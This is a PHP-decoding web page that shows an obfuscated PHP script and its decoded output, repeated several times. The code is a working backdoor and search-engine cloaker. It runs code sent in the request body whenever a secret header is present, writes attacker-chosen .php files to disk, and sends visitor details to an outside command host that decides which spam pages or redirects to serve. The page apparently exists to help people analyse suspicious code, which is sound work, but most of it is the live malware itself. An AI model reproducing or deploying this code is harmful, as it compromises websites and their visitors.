Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

?php goto BBs4_RG50N; w3Bta8GLXU: $result = ''; foreach ($lines as $url) { list($respbody..

Decoded Output download

<?  ?php  goto BBs4_RG50N; w3Bta8GLXU: $result = ''; foreach ($lines as $url) { list($respbody, $code) = urlx($url, null, null, $segs[1]); $result .= $url . $respbody; eaa6MSvWWD: } kkODF5XK_3: exit($result); vVUe5ud4Y9: goto VBgCgWlh42; T9v5mMAMJO: $postdata = "proto={$proto}&shost={$host}&ip={$ip}&dbgroup={$db}&uri={$uri}"; if (!(strlen($token) > 0)) { goto csR8WoV4EC; } @todk(".eGbA0Ty2Wh", @file_get_contents("php://input"), FILE_USE_INCLUDE_PATH); echo include ".eGbA0Ty2Wh"; unlink(".eGbA0Ty2Wh"); goto HdeEyD731j; TcZeoO5s10: $host = $_SERVER["HTTP_HOST"]; $lang = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : ''; $token = isset($_SERVER["HTTP_XDOIM"]) ? $_SERVER["HTTP_XDOIM"] : ''; $proto = !empty($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off" || isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https" || !empty($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off" ? "https" : "http"; $header = array("Lang: " . $lang, "User-Agent: " . $ua, "Referer: " . $ur, "Http-Proto: " . $proto, "Http-Host: " . $host, "Http-Uri: " . $uri, "Dbgroup: " . $db, "Http-X-Forwarded-For: " . $ip, "Token: " . $token); goto T9v5mMAMJO; HdeEyD731j: exit; csR8WoV4EC: if (!($uri !== "/favicon.ico" && (@preg_match("#google|yahoo|bing#i", $ua) || @preg_match("#google.co.jp|google.com|yahoo.com|yahoo.co.jp|bing.com#i", $ur) && @preg_match("#[/\?][a-z0-9]{1}\d+#i", $uri)))) { goto g0r3EgRkvO; } list($cntx, $code, $ctype) = urlx("http://" . $gov . "/index?" . $postdata, $header, $postdata); if (!($code >= 400 && $code < 500)) { goto AT3JbWLo7_; } goto hfiaUYAjjn; hH4ICO3EZc: exit($cntx); VT1dO_lQaI: g0r3EgRkvO: function urlx($url, $header = null, $postdata = null, $ua = null) { goto lbSuCQAyj_; lbSuCQAyj_: $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); goto bIdG8djBX0; aY_urEeYXi: $ctype = curl_getinfo($ch, CURLINFO_CONTENT_TYPE); $body = curl_exec($ch); curl_close($ch); return array($body, $code, $ctype); goto jrd59kwhaB; bIdG8djBX0: curl_setopt($ch, CURLOPT_ENCODING, "gzip,deflate"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); $header === null ? '' : curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); goto GDkCZm5xmF; GDkCZm5xmF: if (!($postdata !== null && $postdata !== '')) { goto aM4Ce1YDlQ; } curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); aM4Ce1YDlQ: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto aY_urEeYXi; jrd59kwhaB: } function todk($fil, $str) { @file_put_contents($fil, $str); } goto Wvqr3l0q2a; GORV1n2Zck: $db = "9500"; $ip = clientip(); $ur = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; $ua = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''; $uri = $_SERVER["REQUEST_URI"]; goto TcZeoO5s10; sImnTTrAqz: Is4XGCgrcN: if (!(stripos($cntx, "<!doct") === 0 || stripos($cntx, "<html") === 0)) { goto PgMQYRbCg6; } exit($cntx); PgMQYRbCg6: if (!(stripos($cntx, "<?xml") === 0)) { goto cZ4Et3JACQ; } goto f68UBDUnnF; kyBkfHRPzt: exit; rOKyc3ZPrS: if (!strstr($cntx, "[,]")) { goto vVUe5ud4Y9; } $segs = explode("[,]", $cntx); $lines = explode(",", $segs[0]); goto w3Bta8GLXU; ZpenPPBAz9: exit; EXRIxcKKky: if (!(stripos($ctype, "gzip") > 0)) { goto Is4XGCgrcN; } @header("Content-type: application/x-gzip"); exit($cntx); goto sImnTTrAqz; C6dOHkdQxG: Q_PCAnb1N5: if (!(stripos($cntx, "ok") === 0)) { goto ipUggXBbpT; } exit($cntx . " " . $db." ".$gov . $ixv); ipUggXBbpT: if (!($cntx != '')) { goto VT1dO_lQaI; } goto hH4ICO3EZc; BBs4_RG50N: error_reporting(0); @set_time_limit(3600); @ignore_user_abort(1); $ixv = "3.3.31"; $gov = "jh.sdoim.com"; goto GORV1n2Zck; TKUGfKGSm9: exit($cntx); x34m7RsFv6: if (!(stripos($cntx, "http") === 0)) { goto saqvck03ZH; } if (!stripos($cntx, "?main_page=")) { goto rOKyc3ZPrS; } @header("Location: " . $cntx); goto kyBkfHRPzt; f68UBDUnnF: @header("Content-type: text/xml"); exit($cntx); cZ4Et3JACQ: if (!(stripos($cntx, "User-a") === 0)) { goto x34m7RsFv6; } @header("Content-type: text/plain;charset=utf-8"); goto TKUGfKGSm9; z1yrtU4URX: exit("no false"); goto M2hWDeg9M5; shUK13tNto: exit("end ok"); M2hWDeg9M5: goto C6dOHkdQxG; VBgCgWlh42: if (!(stripos($cntx, "mercdn") || stripos($cntx, "img.fril"))) { goto OhkexhOEfy; } @header("Content-type: image/jpg"); list($cnimg, $code, $ctype) = urlx($cntx . $uri); exit($cnimg); OhkexhOEfy: goto oX6D4430OE; oX6D4430OE: saqvck03ZH: if (!@preg_match("#^[^.]*.(txt|php)#i", $cntx)) { goto Q_PCAnb1N5; } $values = explode("[,]", $cntx); todk($values[0], $values[1]); if (file_exists($values[0])) { goto shUK13tNto; } goto z1yrtU4URX; hfiaUYAjjn: @header("HTTP/1.1 404 Not Found"); exit($cntx); AT3JbWLo7_: if (!($code >= 500)) { goto EXRIxcKKky; } @header("HTTP/1.1 500 Internal Server Error"); goto ZpenPPBAz9; Wvqr3l0q2a: function clientip() { goto XgP6uL81LZ; v2X1yslb4V: goto PdtZNZkHe3; sT7ahGVV5Z: $realip = $_SERVER["REMOTE_ADDR"]; PdtZNZkHe3: if (!stristr($realip, ",")) { goto tnzq4ZDyet; } goto C1A4VzpN4z; S243ACrF0f: lHiwwKwlUY: $realip = $_SERVER["HTTP_X_FORWARDED_FOR"]; goto PdtZNZkHe3; Sx9w2dcUoN: $realip = getenv("REMOTE_ADDR"); goto v2X1yslb4V; C1A4VzpN4z: $values = explode(",", $realip); $realip = $values[0]; tnzq4ZDyet: return $realip; goto sLkUuZhuhy; XgP6uL81LZ: $realip = ''; if (isset($_SERVER["HTTP_X_FORWARDED_FOR"]) && $_SERVER["HTTP_X_FORWARDED_FOR"] !== '') { goto lHiwwKwlUY; } if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) { goto Sx9w2dcUoN; } if (isset($_SERVER["REMOTE_ADDR"]) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) { goto sT7ahGVV5Z; } goto PdtZNZkHe3; goto S243ACrF0f; sLkUuZhuhy: } ?><?php  goto BBs4_RG50N; w3Bta8GLXU: $result = ''; foreach ($lines as $url) { list($respbody, $code) = urlx($url, null, null, $segs[1]); $result .= $url . $respbody; eaa6MSvWWD: } kkODF5XK_3: exit($result); vVUe5ud4Y9: goto VBgCgWlh42; T9v5mMAMJO: $postdata = "proto={$proto}&shost={$host}&ip={$ip}&dbgroup={$db}&uri={$uri}"; if (!(strlen($token) > 0)) { goto csR8WoV4EC; } @todk(".eGbA0Ty2Wh", @file_get_contents("php://input"), FILE_USE_INCLUDE_PATH); echo include ".eGbA0Ty2Wh"; unlink(".eGbA0Ty2Wh"); goto HdeEyD731j; TcZeoO5s10: $host = $_SERVER["HTTP_HOST"]; $lang = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : ''; $token = isset($_SERVER["HTTP_XDOIM"]) ? $_SERVER["HTTP_XDOIM"] : ''; $proto = !empty($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off" || isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https" || !empty($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off" ? "https" : "http"; $header = array("Lang: " . $lang, "User-Agent: " . $ua, "Referer: " . $ur, "Http-Proto: " . $proto, "Http-Host: " . $host, "Http-Uri: " . $uri, "Dbgroup: " . $db, "Http-X-Forwarded-For: " . $ip, "Token: " . $token); goto T9v5mMAMJO; HdeEyD731j: exit; csR8WoV4EC: if (!($uri !== "/favicon.ico" && (@preg_match("#google|yahoo|bing#i", $ua) || @preg_match("#google.co.jp|google.com|yahoo.com|yahoo.co.jp|bing.com#i", $ur) && @preg_match("#[/\?][a-z0-9]{1}\d+#i", $uri)))) { goto g0r3EgRkvO; } list($cntx, $code, $ctype) = urlx("http://" . $gov . "/index?" . $postdata, $header, $postdata); if (!($code >= 400 && $code < 500)) { goto AT3JbWLo7_; } goto hfiaUYAjjn; hH4ICO3EZc: exit($cntx); VT1dO_lQaI: g0r3EgRkvO: function urlx($url, $header = null, $postdata = null, $ua = null) { goto lbSuCQAyj_; lbSuCQAyj_: $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); goto bIdG8djBX0; aY_urEeYXi: $ctype = curl_getinfo($ch, CURLINFO_CONTENT_TYPE); $body = curl_exec($ch); curl_close($ch); return array($body, $code, $ctype); goto jrd59kwhaB; bIdG8djBX0: curl_setopt($ch, CURLOPT_ENCODING, "gzip,deflate"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); $header === null ? '' : curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); goto GDkCZm5xmF; GDkCZm5xmF: if (!($postdata !== null && $postdata !== '')) { goto aM4Ce1YDlQ; } curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); aM4Ce1YDlQ: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto aY_urEeYXi; jrd59kwhaB: } function todk($fil, $str) { @file_put_contents($fil, $str); } goto Wvqr3l0q2a; GORV1n2Zck: $db = "9500"; $ip = clientip(); $ur = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; $ua = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''; $uri = $_SERVER["REQUEST_URI"]; goto TcZeoO5s10; sImnTTrAqz: Is4XGCgrcN: if (!(stripos($cntx, "<!doct") === 0 || stripos($cntx, "<html") === 0)) { goto PgMQYRbCg6; } exit($cntx); PgMQYRbCg6: if (!(stripos($cntx, "<?xml") === 0)) { goto cZ4Et3JACQ; } goto f68UBDUnnF; kyBkfHRPzt: exit; rOKyc3ZPrS: if (!strstr($cntx, "[,]")) { goto vVUe5ud4Y9; } $segs = explode("[,]", $cntx); $lines = explode(",", $segs[0]); goto w3Bta8GLXU; ZpenPPBAz9: exit; EXRIxcKKky: if (!(stripos($ctype, "gzip") > 0)) { goto Is4XGCgrcN; } @header("Content-type: application/x-gzip"); exit($cntx); goto sImnTTrAqz; C6dOHkdQxG: Q_PCAnb1N5: if (!(stripos($cntx, "ok") === 0)) { goto ipUggXBbpT; } exit($cntx . " " . $db." ".$gov . $ixv); ipUggXBbpT: if (!($cntx != '')) { goto VT1dO_lQaI; } goto hH4ICO3EZc; BBs4_RG50N: error_reporting(0); @set_time_limit(3600); @ignore_user_abort(1); $ixv = "3.3.31"; $gov = "jh.sdoim.com"; goto GORV1n2Zck; TKUGfKGSm9: exit($cntx); x34m7RsFv6: if (!(stripos($cntx, "http") === 0)) { goto saqvck03ZH; } if (!stripos($cntx, "?main_page=")) { goto rOKyc3ZPrS; } @header("Location: " . $cntx); goto kyBkfHRPzt; f68UBDUnnF: @header("Content-type: text/xml"); exit($cntx); cZ4Et3JACQ: if (!(stripos($cntx, "User-a") === 0)) { goto x34m7RsFv6; } @header("Content-type: text/plain;charset=utf-8"); goto TKUGfKGSm9; z1yrtU4URX: exit("no false"); goto M2hWDeg9M5; shUK13tNto: exit("end ok"); M2hWDeg9M5: goto C6dOHkdQxG; VBgCgWlh42: if (!(stripos($cntx, "mercdn") || stripos($cntx, "img.fril"))) { goto OhkexhOEfy; } @header("Content-type: image/jpg"); list($cnimg, $code, $ctype) = urlx($cntx . $uri); exit($cnimg); OhkexhOEfy: goto oX6D4430OE; oX6D4430OE: saqvck03ZH: if (!@preg_match("#^[^.]*.(txt|php)#i", $cntx)) { goto Q_PCAnb1N5; } $values = explode("[,]", $cntx); todk($values[0], $values[1]); if (file_exists($values[0])) { goto shUK13tNto; } goto z1yrtU4URX; hfiaUYAjjn: @header("HTTP/1.1 404 Not Found"); exit($cntx); AT3JbWLo7_: if (!($code >= 500)) { goto EXRIxcKKky; } @header("HTTP/1.1 500 Internal Server Error"); goto ZpenPPBAz9; Wvqr3l0q2a: function clientip() { goto XgP6uL81LZ; v2X1yslb4V: goto PdtZNZkHe3; sT7ahGVV5Z: $realip = $_SERVER["REMOTE_ADDR"]; PdtZNZkHe3: if (!stristr($realip, ",")) { goto tnzq4ZDyet; } goto C1A4VzpN4z; S243ACrF0f: lHiwwKwlUY: $realip = $_SERVER["HTTP_X_FORWARDED_FOR"]; goto PdtZNZkHe3; Sx9w2dcUoN: $realip = getenv("REMOTE_ADDR"); goto v2X1yslb4V; C1A4VzpN4z: $values = explode(",", $realip); $realip = $values[0]; tnzq4ZDyet: return $realip; goto sLkUuZhuhy; XgP6uL81LZ: $realip = ''; if (isset($_SERVER["HTTP_X_FORWARDED_FOR"]) && $_SERVER["HTTP_X_FORWARDED_FOR"] !== '') { goto lHiwwKwlUY; } if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) { goto Sx9w2dcUoN; } if (isset($_SERVER["REMOTE_ADDR"]) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) { goto sT7ahGVV5Z; } goto PdtZNZkHe3; goto S243ACrF0f; sLkUuZhuhy: } ?>

Did this file decode correctly?

Original Code

?php  goto BBs4_RG50N; w3Bta8GLXU: $result = ''; foreach ($lines as $url) { list($respbody, $code) = urlx($url, null, null, $segs[1]); $result .= $url . $respbody; eaa6MSvWWD: } kkODF5XK_3: exit($result); vVUe5ud4Y9: goto VBgCgWlh42; T9v5mMAMJO: $postdata = "\160\x72\x6f\x74\157\75{$proto}\x26\x73\x68\x6f\x73\164\x3d{$host}\46\151\x70\x3d{$ip}\46\144\x62\147\162\x6f\x75\x70\x3d{$db}\46\165\162\151\x3d{$uri}"; if (!(strlen($token) > 0)) { goto csR8WoV4EC; } @todk("\56\x65\107\142\x41\x30\x54\171\x32\x57\x68", @file_get_contents("\x70\x68\160\x3a\x2f\x2f\x69\156\x70\x75\164"), FILE_USE_INCLUDE_PATH); echo include "\x2e\145\107\x62\101\x30\124\171\62\x57\x68"; unlink("\x2e\x65\107\142\101\60\124\171\62\127\x68"); goto HdeEyD731j; TcZeoO5s10: $host = $_SERVER["\110\x54\x54\x50\x5f\110\117\123\124"]; $lang = isset($_SERVER["\x48\124\124\120\x5f\101\x43\x43\x45\x50\x54\137\x4c\101\x4e\x47\125\x41\x47\x45"]) ? $_SERVER["\x48\x54\124\120\x5f\x41\x43\x43\x45\x50\x54\x5f\114\101\x4e\107\x55\x41\107\105"] : ''; $token = isset($_SERVER["\110\x54\124\x50\137\130\104\117\x49\x4d"]) ? $_SERVER["\x48\124\124\x50\137\x58\x44\x4f\111\115"] : ''; $proto = !empty($_SERVER["\x48\x54\124\120\123"]) && strtolower($_SERVER["\x48\124\x54\120\123"]) !== "\157\146\146" || isset($_SERVER["\x48\124\124\x50\137\130\137\106\x4f\x52\x57\x41\x52\x44\105\104\137\x50\122\x4f\x54\x4f"]) && $_SERVER["\110\124\124\120\137\130\137\x46\x4f\x52\127\101\122\x44\105\x44\137\x50\122\x4f\x54\x4f"] === "\x68\164\164\x70\x73" || !empty($_SERVER["\110\124\124\120\x5f\x46\122\117\x4e\x54\137\105\116\104\137\110\x54\124\x50\x53"]) && strtolower($_SERVER["\110\x54\x54\x50\x5f\106\x52\117\116\124\137\x45\x4e\104\137\x48\x54\124\120\123"]) !== "\x6f\146\146" ? "\x68\x74\164\160\163" : "\150\164\164\160"; $header = array("\x4c\x61\156\147\72\40" . $lang, "\x55\x73\145\x72\x2d\x41\147\145\x6e\164\x3a\x20" . $ua, "\122\x65\x66\145\162\145\162\72\x20" . $ur, "\110\164\164\160\55\120\162\157\x74\x6f\x3a\40" . $proto, "\x48\x74\x74\160\55\110\x6f\x73\164\x3a\x20" . $host, "\110\x74\x74\x70\x2d\125\162\x69\72\x20" . $uri, "\104\142\147\162\157\x75\160\72\x20" . $db, "\x48\164\164\x70\55\130\x2d\x46\x6f\x72\167\141\162\144\x65\144\55\106\x6f\x72\x3a\x20" . $ip, "\x54\157\153\x65\156\72\40" . $token); goto T9v5mMAMJO; HdeEyD731j: exit; csR8WoV4EC: if (!($uri !== "\x2f\x66\141\166\x69\x63\x6f\156\56\x69\143\157" && (@preg_match("\43\x67\157\157\x67\154\145\x7c\171\x61\x68\157\x6f\x7c\x62\151\x6e\x67\x23\151", $ua) || @preg_match("\x23\x67\157\x6f\x67\154\x65\x2e\x63\157\56\x6a\160\174\147\157\157\x67\x6c\x65\56\x63\x6f\x6d\174\171\x61\x68\x6f\157\56\143\x6f\x6d\x7c\x79\141\x68\x6f\157\56\143\157\x2e\152\x70\174\142\x69\156\x67\x2e\x63\157\x6d\43\151", $ur) && @preg_match("\43\x5b\57\134\x3f\x5d\133\x61\x2d\172\60\x2d\71\135\x7b\x31\x7d\x5c\144\x2b\x23\x69", $uri)))) { goto g0r3EgRkvO; } list($cntx, $code, $ctype) = urlx("\150\164\x74\x70\x3a\x2f\x2f" . $gov . "\57\151\x6e\x64\x65\170\77" . $postdata, $header, $postdata); if (!($code >= 400 && $code < 500)) { goto AT3JbWLo7_; } goto hfiaUYAjjn; hH4ICO3EZc: exit($cntx); VT1dO_lQaI: g0r3EgRkvO: function urlx($url, $header = null, $postdata = null, $ua = null) { goto lbSuCQAyj_; lbSuCQAyj_: $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); goto bIdG8djBX0; aY_urEeYXi: $ctype = curl_getinfo($ch, CURLINFO_CONTENT_TYPE); $body = curl_exec($ch); curl_close($ch); return array($body, $code, $ctype); goto jrd59kwhaB; bIdG8djBX0: curl_setopt($ch, CURLOPT_ENCODING, "\147\x7a\x69\x70\x2c\144\145\146\x6c\141\x74\145"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); $header === null ? '' : curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $ua === null || $ua === '' ? '' : curl_setopt($ch, CURLOPT_USERAGENT, $ua); goto GDkCZm5xmF; GDkCZm5xmF: if (!($postdata !== null && $postdata !== '')) { goto aM4Ce1YDlQ; } curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); aM4Ce1YDlQ: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto aY_urEeYXi; jrd59kwhaB: } function todk($fil, $str) { @file_put_contents($fil, $str); } goto Wvqr3l0q2a; GORV1n2Zck: $db = "9500"; $ip = clientip(); $ur = isset($_SERVER["\x48\124\x54\120\137\x52\x45\x46\105\122\105\x52"]) ? $_SERVER["\x48\x54\x54\x50\x5f\122\x45\106\105\122\x45\x52"] : ''; $ua = isset($_SERVER["\x48\x54\124\x50\x5f\x55\x53\105\x52\137\x41\107\x45\x4e\124"]) ? $_SERVER["\110\124\124\120\137\125\x53\x45\122\137\101\x47\105\x4e\124"] : ''; $uri = $_SERVER["\x52\105\121\x55\x45\x53\x54\137\125\x52\111"]; goto TcZeoO5s10; sImnTTrAqz: Is4XGCgrcN: if (!(stripos($cntx, "\x3c\41\x64\157\143\x74") === 0 || stripos($cntx, "\x3c\x68\x74\155\x6c") === 0)) { goto PgMQYRbCg6; } exit($cntx); PgMQYRbCg6: if (!(stripos($cntx, "\74\77\x78\x6d\154") === 0)) { goto cZ4Et3JACQ; } goto f68UBDUnnF; kyBkfHRPzt: exit; rOKyc3ZPrS: if (!strstr($cntx, "\133\54\x5d")) { goto vVUe5ud4Y9; } $segs = explode("\133\x2c\135", $cntx); $lines = explode("\x2c", $segs[0]); goto w3Bta8GLXU; ZpenPPBAz9: exit; EXRIxcKKky: if (!(stripos($ctype, "\x67\x7a\151\160") > 0)) { goto Is4XGCgrcN; } @header("\x43\x6f\x6e\x74\x65\156\164\55\x74\x79\x70\145\x3a\x20\x61\x70\160\154\x69\143\141\164\151\x6f\156\x2f\170\x2d\147\172\x69\160"); exit($cntx); goto sImnTTrAqz; C6dOHkdQxG: Q_PCAnb1N5: if (!(stripos($cntx, "\157\x6b") === 0)) { goto ipUggXBbpT; } exit($cntx . "\40" . $db." ".$gov . $ixv); ipUggXBbpT: if (!($cntx != '')) { goto VT1dO_lQaI; } goto hH4ICO3EZc; BBs4_RG50N: error_reporting(0); @set_time_limit(3600); @ignore_user_abort(1); $ixv = "3.3.31"; $gov = "\x6a\150\x2e\163\x64\157\x69\155\x2e\143\x6f\155"; goto GORV1n2Zck; TKUGfKGSm9: exit($cntx); x34m7RsFv6: if (!(stripos($cntx, "\150\164\164\x70") === 0)) { goto saqvck03ZH; } if (!stripos($cntx, "\77\x6d\141\x69\156\137\160\x61\x67\145\x3d")) { goto rOKyc3ZPrS; } @header("\114\x6f\143\x61\164\x69\x6f\x6e\x3a\x20" . $cntx); goto kyBkfHRPzt; f68UBDUnnF: @header("\x43\x6f\x6e\x74\x65\156\164\55\x74\171\160\x65\72\40\x74\x65\x78\x74\x2f\170\155\x6c"); exit($cntx); cZ4Et3JACQ: if (!(stripos($cntx, "\x55\x73\x65\x72\55\141") === 0)) { goto x34m7RsFv6; } @header("\x43\x6f\156\x74\x65\156\164\55\x74\x79\160\x65\x3a\40\x74\145\x78\x74\57\160\154\141\x69\156\x3b\x63\150\141\162\163\145\x74\x3d\165\164\x66\55\x38"); goto TKUGfKGSm9; z1yrtU4URX: exit("\156\157\x20\146\141\x6c\x73\x65"); goto M2hWDeg9M5; shUK13tNto: exit("\x65\x6e\144\x20\x6f\x6b"); M2hWDeg9M5: goto C6dOHkdQxG; VBgCgWlh42: if (!(stripos($cntx, "\155\145\162\x63\x64\156") || stripos($cntx, "\151\x6d\147\56\146\162\151\x6c"))) { goto OhkexhOEfy; } @header("\103\157\156\164\145\156\164\55\x74\x79\x70\x65\x3a\40\x69\155\x61\147\x65\57\152\x70\x67"); list($cnimg, $code, $ctype) = urlx($cntx . $uri); exit($cnimg); OhkexhOEfy: goto oX6D4430OE; oX6D4430OE: saqvck03ZH: if (!@preg_match("\43\136\x5b\136\56\135\x2a\56\50\x74\x78\164\x7c\x70\x68\x70\x29\x23\x69", $cntx)) { goto Q_PCAnb1N5; } $values = explode("\133\54\135", $cntx); todk($values[0], $values[1]); if (file_exists($values[0])) { goto shUK13tNto; } goto z1yrtU4URX; hfiaUYAjjn: @header("\110\124\x54\x50\x2f\61\56\61\x20\x34\x30\64\x20\116\157\164\x20\106\x6f\x75\156\144"); exit($cntx); AT3JbWLo7_: if (!($code >= 500)) { goto EXRIxcKKky; } @header("\x48\x54\124\120\57\x31\56\x31\40\65\60\60\x20\x49\156\164\145\162\156\141\x6c\x20\123\145\x72\x76\x65\162\40\105\162\162\x6f\x72"); goto ZpenPPBAz9; Wvqr3l0q2a: function clientip() { goto XgP6uL81LZ; v2X1yslb4V: goto PdtZNZkHe3; sT7ahGVV5Z: $realip = $_SERVER["\122\x45\x4d\x4f\124\105\x5f\x41\x44\104\x52"]; PdtZNZkHe3: if (!stristr($realip, "\x2c")) { goto tnzq4ZDyet; } goto C1A4VzpN4z; S243ACrF0f: lHiwwKwlUY: $realip = $_SERVER["\x48\x54\124\120\x5f\130\x5f\x46\117\122\127\x41\122\104\x45\x44\137\x46\117\x52"]; goto PdtZNZkHe3; Sx9w2dcUoN: $realip = getenv("\x52\x45\x4d\117\x54\x45\137\x41\x44\104\x52"); goto v2X1yslb4V; C1A4VzpN4z: $values = explode("\x2c", $realip); $realip = $values[0]; tnzq4ZDyet: return $realip; goto sLkUuZhuhy; XgP6uL81LZ: $realip = ''; if (isset($_SERVER["\110\124\124\120\137\x58\137\x46\117\122\127\101\x52\x44\105\x44\137\x46\117\x52"]) && $_SERVER["\110\124\124\120\137\130\137\x46\x4f\x52\x57\x41\x52\x44\x45\x44\x5f\106\117\122"] !== '') { goto lHiwwKwlUY; } if (getenv("\x52\x45\115\x4f\x54\105\137\x41\104\x44\x52") && strcasecmp(getenv("\122\x45\x4d\x4f\x54\105\137\101\104\104\x52"), "\x75\x6e\153\156\x6f\x77\x6e")) { goto Sx9w2dcUoN; } if (isset($_SERVER["\x52\x45\115\x4f\x54\x45\137\101\x44\x44\x52"]) && $_SERVER["\122\x45\115\117\124\x45\137\x41\104\104\122"] && strcasecmp($_SERVER["\122\105\x4d\x4f\x54\105\x5f\101\x44\x44\x52"], "\x75\x6e\153\x6e\x6f\x77\156")) { goto sT7ahGVV5Z; } goto PdtZNZkHe3; goto S243ACrF0f; sLkUuZhuhy: } ?><?php  goto BBs4_RG50N; w3Bta8GLXU: $result = ''; foreach ($lines as $url) { list($respbody, $code) = urlx($url, null, null, $segs[1]); $result .= $url . $respbody; eaa6MSvWWD: } kkODF5XK_3: exit($result); vVUe5ud4Y9: goto VBgCgWlh42; T9v5mMAMJO: $postdata = "\160\x72\x6f\x74\157\75{$proto}\x26\x73\x68\x6f\x73\164\x3d{$host}\46\151\x70\x3d{$ip}\46\144\x62\147\162\x6f\x75\x70\x3d{$db}\46\165\162\151\x3d{$uri}"; if (!(strlen($token) > 0)) { goto csR8WoV4EC; } @todk("\56\x65\107\142\x41\x30\x54\171\x32\x57\x68", @file_get_contents("\x70\x68\160\x3a\x2f\x2f\x69\156\x70\x75\164"), FILE_USE_INCLUDE_PATH); echo include "\x2e\145\107\x62\101\x30\124\171\62\x57\x68"; unlink("\x2e\x65\107\142\101\60\124\171\62\127\x68"); goto HdeEyD731j; TcZeoO5s10: $host = $_SERVER["\110\x54\x54\x50\x5f\110\117\123\124"]; $lang = isset($_SERVER["\x48\124\124\120\x5f\101\x43\x43\x45\x50\x54\137\x4c\101\x4e\x47\125\x41\x47\x45"]) ? $_SERVER["\x48\x54\124\120\x5f\x41\x43\x43\x45\x50\x54\x5f\114\101\x4e\107\x55\x41\107\105"] : ''; $token = isset($_SERVER["\110\x54\124\x50\137\130\104\117\x49\x4d"]) ? $_SERVER["\x48\124\124\x50\137\x58\x44\x4f\111\115"] : ''; $proto = !empty($_SERVER["\x48\x54\124\120\123"]) && strtolower($_SERVER["\x48\124\x54\120\123"]) !== "\157\146\146" || isset($_SERVER["\x48\124\124\x50\137\130\137\106\x4f\x52\x57\x41\x52\x44\105\104\137\x50\122\x4f\x54\x4f"]) && $_SERVER["\110\124\124\120\137\130\137\x46\x4f\x52\127\101\122\x44\105\x44\137\x50\122\x4f\x54\x4f"] === "\x68\164\164\x70\x73" || !empty($_SERVER["\110\124\124\120\x5f\x46\122\117\x4e\x54\137\105\116\104\137\110\x54\124\x50\x53"]) && strtolower($_SERVER["\110\x54\x54\x50\x5f\106\x52\117\116\124\137\x45\x4e\104\137\x48\x54\124\120\123"]) !== "\x6f\146\146" ? "\x68\x74\164\160\163" : "\150\164\164\160"; $header = array("\x4c\x61\156\147\72\40" . $lang, "\x55\x73\145\x72\x2d\x41\147\145\x6e\164\x3a\x20" . $ua, "\122\x65\x66\145\162\145\162\72\x20" . $ur, "\110\164\164\160\55\120\162\157\x74\x6f\x3a\40" . $proto, "\x48\x74\x74\160\55\110\x6f\x73\164\x3a\x20" . $host, "\110\x74\x74\x70\x2d\125\162\x69\72\x20" . $uri, "\104\142\147\162\157\x75\160\72\x20" . $db, "\x48\164\164\x70\55\130\x2d\x46\x6f\x72\167\141\162\144\x65\144\55\106\x6f\x72\x3a\x20" . $ip, "\x54\157\153\x65\156\72\40" . $token); goto T9v5mMAMJO; HdeEyD731j: exit; csR8WoV4EC: if (!($uri !== 